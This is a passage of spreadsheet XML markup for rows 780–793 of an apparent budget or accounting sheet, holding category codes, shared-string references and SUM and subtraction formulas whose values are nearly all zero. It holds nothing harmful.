        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AG780" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AH780" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AI780" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AJ780" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AK780" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AL780" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AM780" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AN780" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AO780" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AP780" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
    </row>
    <row r="781" ht="18" customHeight="1" spans="1:42">
      <c r="A781" s="10"/>
      <c r="B781" s="10"/>
      <c r="C781" s="28"/>
      <c r="D781" s="10">
        <v>2110507</v>
      </c>
      <c r="E781" s="16" t="s">
        <v>3579</v>
      </c>
      <c r="F781" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G781" s="17"/>
      <c r="H781" s="17"/>
      <c r="I781" s="17"/>
      <c r="J781" s="17"/>
      <c r="K781" s="17"/>
      <c r="L781" s="17"/>
      <c r="M781" s="17"/>
      <c r="N781" s="17"/>
      <c r="O781" s="17"/>
      <c r="P781" s="17"/>
      <c r="Q781" s="17"/>
      <c r="R781" s="17"/>
      <c r="S781" s="17"/>
      <c r="T781" s="17"/>
      <c r="U781" s="17"/>
      <c r="V781" s="17"/>
      <c r="W781" s="17"/>
      <c r="X781" s="17"/>
      <c r="Y781" s="17"/>
      <c r="Z781" s="17"/>
      <c r="AA781" s="17"/>
      <c r="AB781" s="17"/>
      <c r="AC781" s="17"/>
      <c r="AD781" s="17"/>
      <c r="AE781" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AF781" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AG781" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AH781" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AI781" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AJ781" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AK781" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AL781" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AM781" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AN781" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AO781" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AP781" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
    </row>
    <row r="782" ht="18" customHeight="1" spans="1:42">
      <c r="A782" s="10"/>
      <c r="B782" s="10"/>
      <c r="C782" s="28"/>
      <c r="D782" s="10">
        <v>2110599</v>
      </c>
      <c r="E782" s="16" t="s">
        <v>3580</v>
      </c>
      <c r="F782" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G782" s="17"/>
      <c r="H782" s="17"/>
      <c r="I782" s="17"/>
      <c r="J782" s="17"/>
      <c r="K782" s="17"/>
      <c r="L782" s="17"/>
      <c r="M782" s="17"/>
      <c r="N782" s="17"/>
      <c r="O782" s="17"/>
      <c r="P782" s="17"/>
      <c r="Q782" s="17"/>
      <c r="R782" s="17"/>
      <c r="S782" s="17"/>
      <c r="T782" s="17"/>
      <c r="U782" s="17"/>
      <c r="V782" s="17"/>
      <c r="W782" s="17"/>
      <c r="X782" s="17"/>
      <c r="Y782" s="17"/>
      <c r="Z782" s="17"/>
      <c r="AA782" s="17"/>
      <c r="AB782" s="17"/>
      <c r="AC782" s="17"/>
      <c r="AD782" s="17"/>
      <c r="AE782" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AF782" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AG782" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AH782" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AI782" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AJ782" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AK782" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AL782" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AM782" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AN782" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AO782" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
      <c r="AP782" s="17">
        <f t="shared" si="383"/>
        <v>0</v>
      </c>
    </row>
    <row r="783" ht="18" customHeight="1" spans="1:42">
      <c r="A783" s="10"/>
      <c r="B783" s="10"/>
      <c r="C783" s="28"/>
      <c r="D783" s="10">
        <v>21106</v>
      </c>
      <c r="E783" s="11" t="s">
        <v>3581</v>
      </c>
      <c r="F783" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G783" s="12">
        <f t="shared" ref="G783:R783" si="384">SUM(G784:G788)</f>
        <v>0</v>
      </c>
      <c r="H783" s="12">
        <f t="shared" si="384"/>
        <v>0</v>
      </c>
      <c r="I783" s="12">
        <f t="shared" si="384"/>
        <v>0</v>
      </c>
      <c r="J783" s="12">
        <f t="shared" si="384"/>
        <v>0</v>
      </c>
      <c r="K783" s="12">
        <f t="shared" si="384"/>
        <v>0</v>
      </c>
      <c r="L783" s="12">
        <f t="shared" si="384"/>
        <v>0</v>
      </c>
      <c r="M783" s="12">
        <f t="shared" si="384"/>
        <v>0</v>
      </c>
      <c r="N783" s="12">
        <f t="shared" si="384"/>
        <v>0</v>
      </c>
      <c r="O783" s="12">
        <f t="shared" si="384"/>
        <v>0</v>
      </c>
      <c r="P783" s="12">
        <f t="shared" si="384"/>
        <v>0</v>
      </c>
      <c r="Q783" s="12">
        <f t="shared" si="384"/>
        <v>0</v>
      </c>
      <c r="R783" s="12">
        <f t="shared" si="384"/>
        <v>0</v>
      </c>
      <c r="S783" s="12">
        <v>0</v>
      </c>
      <c r="T783" s="12">
        <v>0</v>
      </c>
      <c r="U783" s="12">
        <v>0</v>
      </c>
      <c r="V783" s="12">
        <v>0</v>
      </c>
      <c r="W783" s="12">
        <v>0</v>
      </c>
      <c r="X783" s="12">
        <v>0</v>
      </c>
      <c r="Y783" s="12">
        <v>0</v>
      </c>
      <c r="Z783" s="12">
        <v>0</v>
      </c>
      <c r="AA783" s="12">
        <v>0</v>
      </c>
      <c r="AB783" s="12">
        <v>0</v>
      </c>
      <c r="AC783" s="12">
        <v>0</v>
      </c>
      <c r="AD783" s="12">
        <v>0</v>
      </c>
      <c r="AE783" s="12">
        <f t="shared" ref="AE783:AP783" si="385">SUM(AE784:AE788)</f>
        <v>0</v>
      </c>
      <c r="AF783" s="12">
        <f t="shared" si="385"/>
        <v>0</v>
      </c>
      <c r="AG783" s="12">
        <f t="shared" si="385"/>
        <v>0</v>
      </c>
      <c r="AH783" s="12">
        <f t="shared" si="385"/>
        <v>0</v>
      </c>
      <c r="AI783" s="12">
        <f t="shared" si="385"/>
        <v>0</v>
      </c>
      <c r="AJ783" s="12">
        <f t="shared" si="385"/>
        <v>0</v>
      </c>
      <c r="AK783" s="12">
        <f t="shared" si="385"/>
        <v>0</v>
      </c>
      <c r="AL783" s="12">
        <f t="shared" si="385"/>
        <v>0</v>
      </c>
      <c r="AM783" s="12">
        <f t="shared" si="385"/>
        <v>0</v>
      </c>
      <c r="AN783" s="12">
        <f t="shared" si="385"/>
        <v>0</v>
      </c>
      <c r="AO783" s="12">
        <f t="shared" si="385"/>
        <v>0</v>
      </c>
      <c r="AP783" s="12">
        <f t="shared" si="385"/>
        <v>0</v>
      </c>
    </row>
    <row r="784" ht="18" customHeight="1" spans="1:42">
      <c r="A784" s="10"/>
      <c r="B784" s="10"/>
      <c r="C784" s="28"/>
      <c r="D784" s="10">
        <v>2110602</v>
      </c>
      <c r="E784" s="16" t="s">
        <v>3582</v>
      </c>
      <c r="F784" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G784" s="17"/>
      <c r="H784" s="17"/>
      <c r="I784" s="17"/>
      <c r="J784" s="17"/>
      <c r="K784" s="17"/>
      <c r="L784" s="17"/>
      <c r="M784" s="17"/>
      <c r="N784" s="17"/>
      <c r="O784" s="17"/>
      <c r="P784" s="17"/>
      <c r="Q784" s="17"/>
      <c r="R784" s="17"/>
      <c r="S784" s="17"/>
      <c r="T784" s="17"/>
      <c r="U784" s="17"/>
      <c r="V784" s="17"/>
      <c r="W784" s="17"/>
      <c r="X784" s="17"/>
      <c r="Y784" s="17"/>
      <c r="Z784" s="17"/>
      <c r="AA784" s="17"/>
      <c r="AB784" s="17"/>
      <c r="AC784" s="17"/>
      <c r="AD784" s="17"/>
      <c r="AE784" s="17">
        <f t="shared" ref="AE784:AP788" si="386">G784-S784</f>
        <v>0</v>
      </c>
      <c r="AF784" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AG784" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AH784" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AI784" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AJ784" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AK784" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AL784" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AM784" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AN784" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AO784" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AP784" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
    </row>
    <row r="785" ht="18" customHeight="1" spans="1:42">
      <c r="A785" s="10"/>
      <c r="B785" s="10"/>
      <c r="C785" s="28"/>
      <c r="D785" s="10">
        <v>2110603</v>
      </c>
      <c r="E785" s="16" t="s">
        <v>3583</v>
      </c>
      <c r="F785" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G785" s="17"/>
      <c r="H785" s="17"/>
      <c r="I785" s="17"/>
      <c r="J785" s="17"/>
      <c r="K785" s="17"/>
      <c r="L785" s="17"/>
      <c r="M785" s="17"/>
      <c r="N785" s="17"/>
      <c r="O785" s="17"/>
      <c r="P785" s="17"/>
      <c r="Q785" s="17"/>
      <c r="R785" s="17"/>
      <c r="S785" s="17"/>
      <c r="T785" s="17"/>
      <c r="U785" s="17"/>
      <c r="V785" s="17"/>
      <c r="W785" s="17"/>
      <c r="X785" s="17"/>
      <c r="Y785" s="17"/>
      <c r="Z785" s="17"/>
      <c r="AA785" s="17"/>
      <c r="AB785" s="17"/>
      <c r="AC785" s="17"/>
      <c r="AD785" s="17"/>
      <c r="AE785" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AF785" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AG785" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AH785" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AI785" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AJ785" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AK785" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AL785" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AM785" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AN785" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AO785" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AP785" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
    </row>
    <row r="786" ht="18" customHeight="1" spans="1:42">
      <c r="A786" s="10"/>
      <c r="B786" s="10"/>
      <c r="C786" s="28"/>
      <c r="D786" s="10">
        <v>2110604</v>
      </c>
      <c r="E786" s="16" t="s">
        <v>3584</v>
      </c>
      <c r="F786" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G786" s="17"/>
      <c r="H786" s="17"/>
      <c r="I786" s="17"/>
      <c r="J786" s="17"/>
      <c r="K786" s="17"/>
      <c r="L786" s="17"/>
      <c r="M786" s="17"/>
      <c r="N786" s="17"/>
      <c r="O786" s="17"/>
      <c r="P786" s="17"/>
      <c r="Q786" s="17"/>
      <c r="R786" s="17"/>
      <c r="S786" s="17"/>
      <c r="T786" s="17"/>
      <c r="U786" s="17"/>
      <c r="V786" s="17"/>
      <c r="W786" s="17"/>
      <c r="X786" s="17"/>
      <c r="Y786" s="17"/>
      <c r="Z786" s="17"/>
      <c r="AA786" s="17"/>
      <c r="AB786" s="17"/>
      <c r="AC786" s="17"/>
      <c r="AD786" s="17"/>
      <c r="AE786" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AF786" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AG786" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AH786" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AI786" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AJ786" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AK786" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AL786" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AM786" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AN786" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AO786" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AP786" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
    </row>
    <row r="787" ht="18" customHeight="1" spans="1:42">
      <c r="A787" s="10"/>
      <c r="B787" s="10"/>
      <c r="C787" s="28"/>
      <c r="D787" s="10">
        <v>2110605</v>
      </c>
      <c r="E787" s="16" t="s">
        <v>3585</v>
      </c>
      <c r="F787" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G787" s="17"/>
      <c r="H787" s="17"/>
      <c r="I787" s="17"/>
      <c r="J787" s="17"/>
      <c r="K787" s="17"/>
      <c r="L787" s="17"/>
      <c r="M787" s="17"/>
      <c r="N787" s="17"/>
      <c r="O787" s="17"/>
      <c r="P787" s="17"/>
      <c r="Q787" s="17"/>
      <c r="R787" s="17"/>
      <c r="S787" s="17"/>
      <c r="T787" s="17"/>
      <c r="U787" s="17"/>
      <c r="V787" s="17"/>
      <c r="W787" s="17"/>
      <c r="X787" s="17"/>
      <c r="Y787" s="17"/>
      <c r="Z787" s="17"/>
      <c r="AA787" s="17"/>
      <c r="AB787" s="17"/>
      <c r="AC787" s="17"/>
      <c r="AD787" s="17"/>
      <c r="AE787" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AF787" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AG787" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AH787" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AI787" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AJ787" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AK787" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AL787" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AM787" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AN787" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AO787" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AP787" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
    </row>
    <row r="788" ht="18" customHeight="1" spans="1:42">
      <c r="A788" s="10"/>
      <c r="B788" s="10"/>
      <c r="C788" s="28"/>
      <c r="D788" s="10">
        <v>2110699</v>
      </c>
      <c r="E788" s="16" t="s">
        <v>3586</v>
      </c>
      <c r="F788" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G788" s="17"/>
      <c r="H788" s="17"/>
      <c r="I788" s="17"/>
      <c r="J788" s="17"/>
      <c r="K788" s="17"/>
      <c r="L788" s="17"/>
      <c r="M788" s="17"/>
      <c r="N788" s="17"/>
      <c r="O788" s="17"/>
      <c r="P788" s="17"/>
      <c r="Q788" s="17"/>
      <c r="R788" s="17"/>
      <c r="S788" s="17"/>
      <c r="T788" s="17"/>
      <c r="U788" s="17"/>
      <c r="V788" s="17"/>
      <c r="W788" s="17"/>
      <c r="X788" s="17"/>
      <c r="Y788" s="17"/>
      <c r="Z788" s="17"/>
      <c r="AA788" s="17"/>
      <c r="AB788" s="17"/>
      <c r="AC788" s="17"/>
      <c r="AD788" s="17"/>
      <c r="AE788" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AF788" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AG788" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AH788" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AI788" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AJ788" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AK788" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AL788" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AM788" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AN788" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AO788" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
      <c r="AP788" s="17">
        <f t="shared" si="386"/>
        <v>0</v>
      </c>
    </row>
    <row r="789" ht="18" customHeight="1" spans="1:42">
      <c r="A789" s="10"/>
      <c r="B789" s="10"/>
      <c r="C789" s="28"/>
      <c r="D789" s="10">
        <v>21107</v>
      </c>
      <c r="E789" s="11" t="s">
        <v>3587</v>
      </c>
      <c r="F789" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G789" s="12">
        <f t="shared" ref="G789:R789" si="387">SUM(G790:G791)</f>
        <v>0</v>
      </c>
      <c r="H789" s="12">
        <f t="shared" si="387"/>
        <v>0</v>
      </c>
      <c r="I789" s="12">
        <f t="shared" si="387"/>
        <v>0</v>
      </c>
      <c r="J789" s="12">
        <f t="shared" si="387"/>
        <v>0</v>
      </c>
      <c r="K789" s="12">
        <f t="shared" si="387"/>
        <v>0</v>
      </c>
      <c r="L789" s="12">
        <f t="shared" si="387"/>
        <v>0</v>
      </c>
      <c r="M789" s="12">
        <f t="shared" si="387"/>
        <v>0</v>
      </c>
      <c r="N789" s="12">
        <f t="shared" si="387"/>
        <v>0</v>
      </c>
      <c r="O789" s="12">
        <f t="shared" si="387"/>
        <v>0</v>
      </c>
      <c r="P789" s="12">
        <f t="shared" si="387"/>
        <v>0</v>
      </c>
      <c r="Q789" s="12">
        <f t="shared" si="387"/>
        <v>0</v>
      </c>
      <c r="R789" s="12">
        <f t="shared" si="387"/>
        <v>0</v>
      </c>
      <c r="S789" s="12">
        <v>0</v>
      </c>
      <c r="T789" s="12">
        <v>0</v>
      </c>
      <c r="U789" s="12">
        <v>0</v>
      </c>
      <c r="V789" s="12">
        <v>0</v>
      </c>
      <c r="W789" s="12">
        <v>0</v>
      </c>
      <c r="X789" s="12">
        <v>0</v>
      </c>
      <c r="Y789" s="12">
        <v>0</v>
      </c>
      <c r="Z789" s="12">
        <v>0</v>
      </c>
      <c r="AA789" s="12">
        <v>0</v>
      </c>
      <c r="AB789" s="12">
        <v>0</v>
      </c>
      <c r="AC789" s="12">
        <v>0</v>
      </c>
      <c r="AD789" s="12">
        <v>0</v>
      </c>
      <c r="AE789" s="12">
        <f t="shared" ref="AE789:AP789" si="388">SUM(AE790:AE791)</f>
        <v>0</v>
      </c>
      <c r="AF789" s="12">
        <f t="shared" si="388"/>
        <v>0</v>
      </c>
      <c r="AG789" s="12">
        <f t="shared" si="388"/>
        <v>0</v>
      </c>
      <c r="AH789" s="12">
        <f t="shared" si="388"/>
        <v>0</v>
      </c>
      <c r="AI789" s="12">
        <f t="shared" si="388"/>
        <v>0</v>
      </c>
      <c r="AJ789" s="12">
        <f t="shared" si="388"/>
        <v>0</v>
      </c>
      <c r="AK789" s="12">
        <f t="shared" si="388"/>
        <v>0</v>
      </c>
      <c r="AL789" s="12">
        <f t="shared" si="388"/>
        <v>0</v>
      </c>
      <c r="AM789" s="12">
        <f t="shared" si="388"/>
        <v>0</v>
      </c>
      <c r="AN789" s="12">
        <f t="shared" si="388"/>
        <v>0</v>
      </c>
      <c r="AO789" s="12">
        <f t="shared" si="388"/>
        <v>0</v>
      </c>
      <c r="AP789" s="12">
        <f t="shared" si="388"/>
        <v>0</v>
      </c>
    </row>
    <row r="790" ht="18" customHeight="1" spans="1:42">
      <c r="A790" s="10"/>
      <c r="B790" s="10"/>
      <c r="C790" s="28"/>
      <c r="D790" s="10">
        <v>2110704</v>
      </c>
      <c r="E790" s="16" t="s">
        <v>3588</v>
      </c>
      <c r="F790" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G790" s="17"/>
      <c r="H790" s="17"/>
      <c r="I790" s="17"/>
      <c r="J790" s="17"/>
      <c r="K790" s="17"/>
      <c r="L790" s="17"/>
      <c r="M790" s="17"/>
      <c r="N790" s="17"/>
      <c r="O790" s="17"/>
      <c r="P790" s="17"/>
      <c r="Q790" s="17"/>
      <c r="R790" s="17"/>
      <c r="S790" s="17"/>
      <c r="T790" s="17"/>
      <c r="U790" s="17"/>
      <c r="V790" s="17"/>
      <c r="W790" s="17"/>
      <c r="X790" s="17"/>
      <c r="Y790" s="17"/>
      <c r="Z790" s="17"/>
      <c r="AA790" s="17"/>
      <c r="AB790" s="17"/>
      <c r="AC790" s="17"/>
      <c r="AD790" s="17"/>
      <c r="AE790" s="17">
        <f t="shared" ref="AE790:AP791" si="389">G790-S790</f>
        <v>0</v>
      </c>
      <c r="AF790" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AG790" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AH790" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AI790" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AJ790" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AK790" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AL790" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AM790" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AN790" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AO790" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AP790" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
    </row>
    <row r="791" ht="18" customHeight="1" spans="1:42">
      <c r="A791" s="10"/>
      <c r="B791" s="10"/>
      <c r="C791" s="28"/>
      <c r="D791" s="10">
        <v>2110799</v>
      </c>
      <c r="E791" s="16" t="s">
        <v>3589</v>
      </c>
      <c r="F791" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G791" s="17"/>
      <c r="H791" s="17"/>
      <c r="I791" s="17"/>
      <c r="J791" s="17"/>
      <c r="K791" s="17"/>
      <c r="L791" s="17"/>
      <c r="M791" s="17"/>
      <c r="N791" s="17"/>
      <c r="O791" s="17"/>
      <c r="P791" s="17"/>
      <c r="Q791" s="17"/>
      <c r="R791" s="17"/>
      <c r="S791" s="17"/>
      <c r="T791" s="17"/>
      <c r="U791" s="17"/>
      <c r="V791" s="17"/>
      <c r="W791" s="17"/>
      <c r="X791" s="17"/>
      <c r="Y791" s="17"/>
      <c r="Z791" s="17"/>
      <c r="AA791" s="17"/>
      <c r="AB791" s="17"/>
      <c r="AC791" s="17"/>
      <c r="AD791" s="17"/>
      <c r="AE791" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AF791" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AG791" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AH791" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AI791" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AJ791" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AK791" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AL791" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AM791" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AN791" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AO791" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
      <c r="AP791" s="17">
        <f t="shared" si="389"/>
        <v>0</v>
      </c>
    </row>
    <row r="792" ht="18" customHeight="1" spans="1:42">
      <c r="A792" s="10"/>
      <c r="B792" s="10"/>
      <c r="C792" s="28"/>
      <c r="D792" s="10">
        <v>21108</v>
      </c>
      <c r="E792" s="11" t="s">
        <v>3590</v>
      </c>
      <c r="F792" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G792" s="12">
        <f t="shared" ref="G792:R792" si="390">SUM(G793:G794)</f>
        <v>0</v>
      </c>
      <c r="H792" s="12">
        <f t="shared" si="390"/>
        <v>0</v>
      </c>
      <c r="I792" s="12">
        <f t="shared" si="390"/>
        <v>0</v>
      </c>
      <c r="J792" s="12">
        <f t="shared" si="390"/>
        <v>0</v>
      </c>
      <c r="K792" s="12">
        <f t="shared" si="390"/>
        <v>0</v>
      </c>
      <c r="L792" s="12">
        <f t="shared" si="390"/>
        <v>0</v>
      </c>
      <c r="M792" s="12">
        <f t="shared" si="390"/>
        <v>0</v>
      </c>
      <c r="N792" s="12">
        <f t="shared" si="390"/>
        <v>0</v>
      </c>
      <c r="O792" s="12">
        <f t="shared" si="390"/>
        <v>0</v>
      </c>
      <c r="P792" s="12">
        <f t="shared" si="390"/>
        <v>0</v>
      </c>
      <c r="Q792" s="12">
        <f t="shared" si="390"/>
        <v>0</v>
      </c>
      <c r="R792" s="12">
        <f t="shared" si="390"/>
        <v>0</v>
      </c>
      <c r="S792" s="12">
        <v>0</v>
      </c>
      <c r="T792" s="12">
        <v>0</v>
      </c>
      <c r="U792" s="12">
        <v>0</v>
      </c>
      <c r="V792" s="12">
        <v>0</v>
      </c>
      <c r="W792" s="12">
        <v>0</v>
      </c>
      <c r="X792" s="12">
        <v>0</v>
      </c>
      <c r="Y792" s="12">
        <v>0</v>
      </c>
      <c r="Z792" s="12">
        <v>0</v>
      </c>
      <c r="AA792" s="12">
        <v>0</v>
      </c>
      <c r="AB792" s="12">
        <v>0</v>
      </c>
      <c r="AC792" s="12">
        <v>0</v>
      </c>
      <c r="AD792" s="12">
        <v>0</v>
      </c>
      <c r="AE792" s="12">
        <f t="shared" ref="AE792:AP792" si="391">SUM(AE793:AE794)</f>
        <v>0</v>
      </c>
      <c r="AF792" s="12">
        <f t="shared" si="391"/>
        <v>0</v>
      </c>
      <c r="AG792" s="12">
        <f t="shared" si="391"/>
        <v>0</v>
      </c>
      <c r="AH792" s="12">
        <f t="shared" si="391"/>
        <v>0</v>
      </c>
      <c r="AI792" s="12">
        <f t="shared" si="391"/>
        <v>0</v>
      </c>
      <c r="AJ792" s="12">
        <f t="shared" si="391"/>
        <v>0</v>
      </c>
      <c r="AK792" s="12">
        <f t="shared" si="391"/>
        <v>0</v>
      </c>
      <c r="AL792" s="12">
        <f t="shared" si="391"/>
        <v>0</v>
      </c>
      <c r="AM792" s="12">
        <f t="shared" si="391"/>
        <v>0</v>
      </c>
      <c r="AN792" s="12">
        <f t="shared" si="391"/>
        <v>0</v>
      </c>
      <c r="AO792" s="12">
        <f t="shared" si="391"/>
        <v>0</v>
      </c>
      <c r="AP792" s="12">
        <f t="shared" si="391"/>
        <v>0</v>
      </c>
    </row>
    <row r="793" ht="18" customHeight="1" spans="1:42">
      <c r="A793" s="10"/>
      <c r="B793" s="10"/>
      <c r="C793" s="28"/>
      <c r="D793" s="10">
        <v>2110804</v>
      </c>
      <c r="E793" s="16" t="s">
        <v>3591</v>
      </c>
      <c r="F793" s="14">
        <f t="shared" si="380"/>
        <v>0</v>
      </c>
      <c r="G793" s="17"/>
